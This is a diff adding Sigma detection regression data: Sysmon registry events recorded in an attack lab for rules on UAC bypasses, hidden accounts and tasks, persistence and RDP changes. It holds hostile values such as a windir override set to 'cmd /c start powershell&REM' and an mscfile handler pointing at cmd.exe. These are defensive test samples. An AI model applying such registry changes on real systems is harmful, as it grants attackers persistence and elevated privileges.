diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json
new file mode 100644
index 000000000..e0ee86d51
--- /dev/null
+++ b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 12, + "Version": 2, + "Level": 4, + "Task": 12, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T00:01:54.872810Z" + } + }, + "EventRecordID": 155709, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "DeleteValue", + "UtcTime": "2025-10-25 00:01:54.861", + "ProcessGuid": "5AA13A44-1372-68FC-A51E-000000004002", + "ProcessId": 7008, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\MaliciousTask\\SD", + "User": "NT AUTHORITY\\SYSTEM" + } + } +} diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml new file mode 100644 index 000000000..797434d31 --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml 
@@ -0,0 +1,13 @@
+id: b796fd1e-a03a-4db8-a072-c597b6e0da1b
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: acd74772-5f88-45c7-956b-6a7b36c294d2
+ title: Removal Of SD Value to Hide Schedule Task - Registry
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx
diff --git a/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx
new file mode 100644
index 000000000..d2da07e5e
Binary files /dev/null and b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx differ
diff --git a/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.json b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.json
new file mode 100644
index 000000000..4f8bd046f
--- /dev/null
+++ b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2020-12-18T17:56:07.017817Z" + } + }, + "EventRecordID": 596571, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3552, + "ThreadID": 5004 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "MSEDGEWIN10", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "Hidden Local Account Created", + "EventType": "SetValue", + "UtcTime": "2020-12-18 17:56:07.015", + "ProcessGuid": "747F3D96-68DD-5FDD-0000-00101B660000", + "ProcessId": 648, + "Image": "C:\\Windows\\system32\\lsass.exe", + "TargetObject": "HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\hideme0007$\\(Default)", + "Details": "Binary Data" + } + } +} diff --git a/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml new file mode 100644 index 000000000..b8654b91d --- /dev/null +++ b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml 
@@ -0,0 +1,13 @@
+id: 1c45847c-0ccb-43f5-aa06-ad97d1553d5a
+description: N/A
+date: 2025-10-31
+author: SigmaHQ Team
+rule_metadata:
+ - id: 460479f3-80b7-42da-9c43-2cc1d54dbccd
+ title: Creation of a Local Hidden User Account by Registry
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx
diff --git a/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx b/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx
new file mode 100644
index 000000000..007a96728
Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx differ
diff --git a/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.json b/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.json
new file mode 100644
index 000000000..68a480c1f
--- /dev/null
+++ b/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.json
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T17:28:03.064387Z" + } + }, + "EventRecordID": 27517409, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 17:28:03.060", + "ProcessGuid": "5AA13A44-5A23-68FE-2155-000000004002", + "ProcessId": 4400, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\AtomicSafeMode\\(Default)", + "Details": "Service", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml b/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml new file mode 100644 index 000000000..3ecfc8225 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml 
@@ -0,0 +1,13 @@
+id: 26f40be2-5b94-4e29-9e34-2e8efb43d6f8
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 1547e27c-3974-43e2-a7d7-7f484fb928ec
+ title: Registry Persistence via Service in Safe Mode
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx
diff --git a/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx b/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx
new file mode 100644
index 000000000..24ec37863
Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx differ
diff --git a/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.json b/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.json
new file mode 100644
index 000000000..89f19962e
--- /dev/null
+++ b/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.json
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T17:33:36.133400Z" + } + }, + "EventRecordID": 27619790, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 17:33:36.131", + "ProcessGuid": "5AA13A44-5B70-68FE-4655-000000004002", + "ProcessId": 8024, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Print\\Monitors\\AtomicRedTeam\\Driver", + "Details": "C:\\AtomicRedTeam\\atomics\\T1547.010\\bin\\PortMonitor.dll", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/info.yml b/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/info.yml new file mode 100644 index 000000000..3cd8781d2 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/info.yml 
@@ -0,0 +1,13 @@
+id: 8f807b19-07e7-4471-b4ff-d961f2e1d71f
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 944e8941-f6f6-4ee8-ac05-1c224e923c0e
+ title: Add Port Monitor Persistence in Registry
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx
diff --git a/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx b/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx
new file mode 100644
index 000000000..764c4cb86
Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx differ
diff --git a/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json b/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json
new file mode 100644
index 000000000..95a79842e
--- /dev/null
+++ b/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T17:36:04.950926Z" + } + }, + "EventRecordID": 27665830, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 17:36:04.941", + "ProcessGuid": "5AA13A44-5C04-68FE-5855-000000004002", + "ProcessId": 10080, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp", + "Details": "DWORD (0x00000001)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml b/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml new file mode 100644 index 000000000..2daa6478e --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml 
@@ -0,0 +1,13 @@
+id: a9bcd1ab-6556-4fc3-b9c9-724b335485e4
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b
+ title: Allow RDP Remote Assistance Feature
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx
diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx
new file mode 100644
index 000000000..842a80237
Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx differ
diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.json b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.json
new file mode 100644
index 000000000..9ac48ad77
--- /dev/null
+++ b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.json
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T17:41:48.911849Z" + } + }, + "EventRecordID": 27772045, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 17:41:48.898", + "ProcessGuid": "5AA13A44-5D5B-68FE-7B55-000000004002", + "ProcessId": 420, + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\Folder\\shell\\open\\command\\DelegateExecute", + "Details": "(Empty)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml new file mode 100644 index 000000000..1bd84b34b --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml 
@@ -0,0 +1,13 @@
+id: 7fce1d05-2297-48a4-a670-f28745819c8a
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 46dd5308-4572-4d12-aa43-8938f0184d4f
+ title: Bypass UAC Using DelegateExecute
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx
diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx
new file mode 100644
index 000000000..17d338b42
Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx differ
diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.json b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.json
new file mode 100644
index 000000000..8b7365170
--- /dev/null
+++ b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.json
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T17:43:38.730630Z" + } + }, + "EventRecordID": 27806256, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 17:43:38.715", + "ProcessGuid": "5AA13A44-5DCA-68FE-8B55-000000004002", + "ProcessId": 9920, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\mscfile\\shell\\open\\command\\(Default)", + "Details": "C:\\Windows\\System32\\cmd.exe", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml new file mode 100644 index 000000000..e6917946a --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml 
@@ -0,0 +1,13 @@
+id: a6667fba-7437-4b37-8584-5de021f91115
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 674202d0-b22a-4af4-ae5f-2eda1f3da1af
+ title: Bypass UAC Using Event Viewer
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx
diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx
new file mode 100644
index 000000000..fc787097b
Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx differ
diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.json b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.json
new file mode 100644
index 000000000..4f307ee8b
--- /dev/null
+++ b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.json
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T17:50:12.576627Z" + } + }, + "EventRecordID": 27929906, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 17:50:12.565", + "ProcessGuid": "5AA13A44-5F54-68FE-B455-000000004002", + "ProcessId": 2768, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Environment\\windir", + "Details": "cmd /c start powershell&REM", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml new file mode 100644 index 000000000..199dda002 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml 
@@ -0,0 +1,13 @@
+id: 48965782-760d-4620-9bf3-7fb0bb441d0f
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 724ea201-6514-4f38-9739-e5973c34f49a
+ title: Bypass UAC Using SilentCleanup Task
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx
diff --git a/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx b/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx
new file mode 100644
index 000000000..26a6abf83
Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx differ
diff --git a/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.json b/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.json
new file mode 100644
index 000000000..2d60d8671
--- /dev/null
+++ b/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.json
@@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:10:21.083557Z" + } + }, + "EventRecordID": 28299540, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:10:21.071", + "ProcessGuid": "5AA13A44-640D-68FE-3756-000000004002", + "ProcessId": 992, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber", + "Details": "DWORD (0x00001189)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/info.yml b/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/info.yml new file mode 100644 index 000000000..3d555efd6 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_change_rdp_port/info.yml 
@@ -0,0 +1,13 @@ +id: 88bf1ccf-789d-4864-9eaf-547990ffe90a +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 509e84b9-a71a-40e0-834f-05470369bd1e + title: Default RDP Port Changed to Non Standard Port +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx b/regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx new file mode 100644 index 000000000..9723210ff Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.json b/regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.json new file mode 100644 index 000000000..cf3695211 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.json 
@@ -0,0 +1,156 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T18:12:38.481829Z" + } + }, + "EventRecordID": 28344631, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 18:12:38.476", + "ProcessGuid": "5AA13A44-6494-68FE-6A56-000000004002", + "ProcessId": 7460, + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\bad-subdomain\\https", + "Details": "DWORD (0x00000002)", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": 